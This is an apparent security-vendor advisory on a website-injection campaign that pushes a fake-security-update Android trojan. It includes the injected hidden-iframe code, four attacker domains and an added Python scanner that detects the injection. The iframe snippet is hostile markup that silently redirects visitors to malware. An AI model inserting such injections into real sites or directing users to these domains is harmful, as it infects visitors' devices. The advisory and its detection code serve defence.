Website Injection-Campaign Used in Conjunction with an Android Trojan

Back in December of 2011, Symantec identified the first case of an Android threat that was used in conjunction with a website-injection campaign targeting sites in the Middle East. Android.Arspam was an Android Trojan that redirected users to sites where a Hacktivist message was being delivered.

Today another website-injection campaign has come to light involving Android; only this time, the campaign involves the distribution of a mobile threat. This is not a typical drive-by-download whereby the application is automatically installed through an exploit – but rather the user is prompted to install the application after download.

Originally reported by the owner of an infected site on a social-bookmarking website, multiple sites have now emerged with a URL redirect injected into the HTML body of an infected page. Reminiscent of Android.Bgserv, a malicious version of a Google security patch discovered by Symantec last year, the Trojan is delivered as a fake security package. Devices that allow installation from 'Unknown Sources' are the most susceptible to this type of attack, since the user has to manually accept the permissions and prompts requested prior to installation.

The following domains have been identified so far based on our investigation:

  • [http://]androidbia.info
  • [http://]androidjea.info
  • [http://]gaoanalitics.info
  • [http://]androidonlinefix.info

The website injection is of the form:

<iframe style="visibility: hidden; display: none; display: none;"
src="[http://]gaoanalitics.info/?id=[CLSID]">;
</iframe>

This injection has been identified not only in HTML pages, but also in robots.txt files. Therefore, it could well be the case that every file on a compromised Web server has had this iframe appended to it.
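As an added example (not code from the original post or from Symantec), the following Python script shows how a site owner could sweep a web root for the injection described above: it looks for iframe tags in every file, not just HTML, flags any whose src host matches one of the four domains listed in the post, and separately flags iframes hidden with the display:none / visibility:hidden style seen in the injection. The sample files, the EXAMPLE-ID query value standing in for the elided [CLSID], and the benign www.example.com embed are constructed for the demonstration.

```python
import os
import re

# Indicator domains from the write-up (defanged "[http://]" prefix removed).
IOC_DOMAINS = {
    "androidbia.info",
    "androidjea.info",
    "gaoanalitics.info",
    "androidonlinefix.info",
}

# Opening <iframe ...> tag; the group captures the raw attribute text.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE | re.DOTALL)
# name="value" or name='value' attribute pairs.
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"|(\w+)\s*=\s*\'([^\']*)\'', re.DOTALL)
# Host part of an absolute or protocol-relative URL.
HOST_RE = re.compile(r"^(?:https?:)?//([^/:?#]+)", re.IGNORECASE)

# Constructed sample files: two carrying the injection (one of them robots.txt,
# as the post notes the iframe was found there too) and one clean page.
SAMPLE_FILES = {
    "index.html": (
        "<html><body>\n"
        "<p>Welcome</p>\n"
        '<iframe style="visibility: hidden; display: none; display: none;"\n'
        'src="http://gaoanalitics.info/?id=EXAMPLE-ID">;\n'
        "</iframe>\n"
        "</body></html>\n"
    ),
    "robots.txt": (
        "User-agent: *\n"
        "Disallow: /admin/\n"
        '<iframe style="visibility: hidden; display: none; display: none;" '
        'src="http://androidonlinefix.info/?id=EXAMPLE-ID"></iframe>\n'
    ),
    "clean.html": (
        "<html><body>\n"
        '<iframe src="https://www.example.com/embed" style="width:100%"></iframe>\n'
        "</body></html>\n"
    ),
}


def parse_attrs(attr_text):
    """Return a lower-cased name -> value dict for the attributes of one tag."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        if m.group(1):
            attrs[m.group(1).lower()] = m.group(2)
        else:
            attrs[m.group(3).lower()] = m.group(4)
    return attrs


def is_hidden(style):
    """True if the inline style hides the frame (the injection's signature)."""
    s = style.lower().replace(" ", "")
    return "display:none" in s or "visibility:hidden" in s


def host_of(url):
    """Lower-cased host of a URL, or '' if it is relative or unparsable."""
    m = HOST_RE.match(url.strip())
    return m.group(1).lower() if m else ""


def is_ioc_host(host):
    """Exact or subdomain match against the indicator list."""
    return host in IOC_DOMAINS or any(host.endswith("." + d) for d in IOC_DOMAINS)


def scan_text(name, text):
    """Return one finding per iframe that is hidden or points at an IoC domain."""
    findings = []
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        hidden = is_hidden(attrs.get("style", ""))
        known = is_ioc_host(host_of(src))
        if hidden or known:
            line = text.count("\n", 0, m.start()) + 1  # 1-based line of the tag
            findings.append({"file": name, "line": line, "src": src,
                             "hidden": hidden, "known_ioc": known})
    return findings


def scan_samples():
    """Scan the constructed samples; stands in for a real web root."""
    findings = []
    for name, text in SAMPLE_FILES.items():
        findings.extend(scan_text(name, text))
    return findings


def scan_tree(root):
    """Scan every regular file under a directory (binary files are read leniently)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                findings.extend(scan_text(path, fh.read()))
    return findings


if __name__ == "__main__":
    for f in scan_samples():
        tag = "IOC" if f["known_ioc"] else "hidden-iframe"
        print(f"{f['file']}:{f['line']} [{tag}] src={f['src']}")
```

Run scan_tree("/var/www/html") (path is an assumption) against a real document root; a hidden iframe to an unknown host is worth a look even when it does not match the indicator list, which is why the two conditions are reported separately.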

The payload itself is not very complicated to understand. It is not obfuscated; it consists of just a few simple proxy and socket routines that the author of the threat can use to route traffic from an infected device to an external source. The real concern with this threat lies not in its immediate functionality, but in what it is capable of doing on behalf of an external party. As called out in our latest version of the Symantec ISTR report, threats like these represent a change in strategy by malware developers, moving away from traditional "smash-and-grab" jobs, like premium-SMS scams, to more sophisticated issues like privacy concerns and the theft of sensitive content used in extortion rackets, click-jacking, etc.

With Norton Safeweb technology, this attack is blocked before the application even starts its download, unlike some other mobile security suites that rely solely on detecting threats after the download or during installation. Symantec currently detects this threat as Android.Notcompatible.

With Bring Your Own Device (BYOD) adoption increasing astronomically, threats like these represent a paradigm shift in mobile malware. Although the number of sites compromised so far is small, it opens up the possibility of large-scale web-injection attacks used to distribute malicious mobile applications.